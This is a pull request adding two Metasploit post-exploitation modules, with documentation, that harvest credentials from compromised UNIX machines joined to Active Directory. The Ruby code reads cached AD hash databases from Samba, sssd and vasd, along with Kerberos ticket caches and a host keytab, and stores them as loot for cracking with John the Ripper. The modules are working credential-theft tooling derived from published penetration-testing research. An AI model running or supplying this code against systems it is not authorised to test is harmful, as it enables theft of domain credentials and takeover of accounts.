### PR TITLE
Add post-exploitation modules to attack Active Directory integration solutions on UNIX

### DIFF
--- a/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md
+++ b/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+  This post-exploitation module is to attack Active Directory integration solutions on UNIX. Specifically, it
+  obtains all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR).
+
+  More detail about the underlying research from which these modules were derived can be found at:
+  
+  * https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/
+
+  This post contains both links to the Black Hat Europe 2018 presentation where the research was publicly
+  disclosed as well as the Portcullis Labs GitHub repo from which this post-exploitation module is derived.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Establish a valid Meterpreter session
+  4. Do: ```use post/multi/gather/unix_cached_ad_hashes```
+  5. Do: ```run```
+  6. You should get the cached hashes
+
+  Files will be retrieved and placed into the Metasploit loot sub-system as unix_cached_ad_hashes_*.
+
+  There are no CVEs aligned to these post-exploitation modules because no specific vulnerabilities are being
+  exploited in gathering these files. The post-exploitation module is intended to operate on sessions where
+  root (or appropriate user) privileges has already been obtained.
+
+## Scenarios
+
+### Samba (smbd)
+  
+  On a system running Samba (smbd), the modules will gather:
+
+  * /var/lib/samba/private/secrets.tdb
+  * /var/lib/samba/passdb.tdb
+
+  JtR can natively crack the cached hashes extracted from this database using tdbdump.
+
+### SSS (sssd)
+
+  On a system running SSS (sssd), the modules will gather:
+
+  * /var/lib/sss/db/cache_*
+
+  JtR can natively crack the cached hashes extracted from this database using tdbdump.
+
+### One Identity Vintela Authentication Services (vasd)
+
+  On a system running One Identity's Vintela Authentication Services (vasd), the modules will gather:
+
+  * /var/opt/quest/vas/authcache/vas_auth.vdb
+
+  JtR can crack the cached hashes extracted from this database using sqlite3 using the dynamic.conf rules located
+  in our GitHub repo:
+
+  * https://github.com/portcullislabs/linikatz/tree/master/red/JohnTheRipper

--- a/documentation/modules/post/multi/gather/unix_kerberos_tickets.md
+++ b/documentation/modules/post/multi/gather/unix_kerberos_tickets.md
@@ -1,0 +1,41 @@
+## Vulnerable Application
+
+  This post-exploitation module is to attack Active Directory integration solutions on UNIX. Specifically, it
+  obtains all Kerberos tickets on the targeted UNIX machine.
+
+  More detail about the underlying research from which these modules were derived can be found at:
+  
+  * https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/
+
+  This post contains both links to the Black Hat Europe 2018 presentation where the research was publicly
+  disclosed as well as the Portcullis Labs GitHub repo from which this post-exploitation module is derived.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Establish a valid Meterpreter session
+  4. Do: ```use post/multi/gather/unix_kerberos_tickets```
+  5. Do: ```run```
+  6. You should get the Kerberos tickets
+
+  Files will be retrieved and placed into the Metasploit loot sub-system as unix_kerberos_tickets_*.
+
+  There are no CVEs aligned to these post-exploitation modules because no specific vulnerabilities are being
+  exploited in gathering these files. The post-exploitation module is intended to operate on sessions where
+  root (or appropriate user) privileges has already been obtained.
+
+## Scenarios
+
+### SSS (sssd)
+
+  On a system running SSS (sssd), the modules will gather:
+
+  * /var/lib/sss/db/ccache_*
+  * /tmp/krb5*
+
+### One Identity Vintela Authentication Services (vasd)
+
+  On a system running One Identity's Vintela Authentication Services (vasd), the modules will gather:
+
+  * /tmp/krb5*

--- a/modules/post/multi/gather/unix_cached_ad_hashes.rb
+++ b/modules/post/multi/gather/unix_cached_ad_hashes.rb
@@ -1,0 +1,68 @@
+# Copyright (c) 2015-2018, Cisco International Ltd
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#     * Redistributions of source code must retain the above copyright
+#       notice, this list of conditions and the following disclaimer.
+#     * Redistributions in binary form must reproduce the above copyright
+#       notice, this list of conditions and the following disclaimer in the
+#       documentation and/or other materials provided with the distribution.
+#     * Neither the name of the Cisco International Ltd nor the
+#       names of its contributors may be used to endorse or promote products
+#       derived from this software without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL CISCO INTERNATIONAL LTD BE LIABLE FOR ANY
+# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info(info,
+      "Name"           => "UNIX Gather Cached AD Hashes",
+      "Description"    => %q{ Post Module to obtain all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR). },
+      "License"        => MSF_LICENSE,
+      "Author"         => [ "Tim Brown <timb[at]nth-dimension.org.uk>"],
+      "Platform"       => %w{ linux osx unix solaris aix },
+      "SessionTypes"   => [ "meterpreter", "shell" ]
+    ))
+  end
+
+  def run
+    print_status("Finding files")
+    files = [ "/var/lib/samba/private/secrets.tdb", "/var/lib/samba/passdb.tdb", "/var/opt/quest/vas/authcache/vas_auth.vdb" ]
+    files = files + cmd_exec("ls /var/lib/sss/db/cache_*").split(/\r\n|\r|\n/)
+    files = files.select { |d| file?(d) }
+    if files.nil? || files.empty?
+      print_error("No cached AD hashes found")
+      return
+    end
+    download_loot(files)
+  end
+
+  def download_loot(files)
+    print_status("Looting #{files.count} files")
+    files.each do |file|
+      file.chomp!
+      sep = "/"
+      print_status("Downloading #{file}")
+      data = read_file(file)
+      file = file.split(sep).last
+      loot_file = store_loot("unix_cached_ad_hashes", "text/plain", session, data, "unix_cached_ad_hashes_#{file}", "Cached AD Hashes File")
+      print_good("File stored in: #{loot_file.to_s}")
+    end
+  end
+end

--- a/modules/post/multi/gather/unix_kerberos_tickets.rb
+++ b/modules/post/multi/gather/unix_kerberos_tickets.rb
@@ -1,0 +1,69 @@
+# Copyright (c) 2015-2018, Cisco International Ltd
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#     * Redistributions of source code must retain the above copyright
+#       notice, this list of conditions and the following disclaimer.
+#     * Redistributions in binary form must reproduce the above copyright
+#       notice, this list of conditions and the following disclaimer in the
+#       documentation and/or other materials provided with the distribution.
+#     * Neither the name of the Cisco International Ltd nor the
+#       names of its contributors may be used to endorse or promote products
+#       derived from this software without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL CISCO INTERNATIONAL LTD BE LIABLE FOR ANY
+# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info={})
+    super( update_info(info,
+      "Name"           => "UNIX Gather Kerberos Tickets",
+      "Description"    => %q{ Post Module to obtain all kerberos tickets on the targeted UNIX machine. },
+      "License"        => MSF_LICENSE,
+      "Author"         => [ "Tim Brown <timb[at]nth-dimension.org.uk>"],
+      "Platform"       => %w{ linux osx unix solaris aix },
+      "SessionTypes"   => [ "meterpreter", "shell" ]
+    ))
+  end
+
+  def run
+    print_status("Finding files")
+    files = [ "/etc/opt/quest/vas/host.keytab" ]
+    files = files + cmd_exec("ls /var/lib/sss/db/ccache_*").split(/\r\n|\r|\n/)
+    files = files + cmd_exec("ls /tmp/krb5*").split(/\r\n|\r|\n/)
+    files = files.select { |d| file?(d) }
+    if files.nil? || files.empty?
+      print_error("No kerberos tickets found")
+      return
+    end
+    download_loot(files)
+  end
+
+  def download_loot(files)
+    print_status("Looting #{files.count} files")
+    files.each do |file|
+      file.chomp!
+      sep = "/"
+      print_status("Downloading #{file}")
+      data = read_file(file)
+      file = file.split(sep).last
+      loot_file = store_loot("unix_kerberos_tickets", "text/plain", session, data, "unix_kerberos_tickets_#{file}", "Kerberos Tickets File")
+      print_good("File stored in: #{loot_file.to_s}")
+    end
+  end
+end


### PR DESCRIPTION
This change adds post-exploitation modules to attack Active Directory integration solutions on UNIX. Specifically:

* unix_cached_ad_hashes.rb - Obtains all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR)
* unix_kerberos_tickets.rb - Obtains all Kerberos tickets on the targeted UNIX machine

More detail about the underlying research from which these modules were derived can be found at:

* https://labs.portcullis.co.uk/blog/an-offensive-introduction-to-active-directory-on-unix/

This post contains both links to the Black Hat Europe 2018 presentation where the research was publicly disclosed as well as the Portcullis Labs GitHub repo from which these post-exploitation modules are derived.

## Verification

On a system running SSS (sssd) or One Identity's Vintela Authentication Services (vasd), the modules will gather:

* unix_cached_ad_hashes.rb
 * /var/lib/samba/private/secrets.tdb
 * /var/lib/samba/passdb.tdb
 * /var/opt/quest/vas/authcache/vas_auth.vdb
 * /var/lib/sss/db/cache_*
* unix_kerberos_tickets.rb
 * /var/lib/sss/db/ccache_*
 * /tmp/krb5*

Files will be retrieved and placed into the Metasploit loot sub-system as unix_cached_ad_hashes_* and  unix_kerberos_tickets_* respectively.

Note: There are no CVEs aligned to these post-exploitation modules because no specific vulnerabilities are being exploited in gathering these files. The post-exploitation modules are intended to operate on sessions where root (or appropriate user) privileges has already been obtained.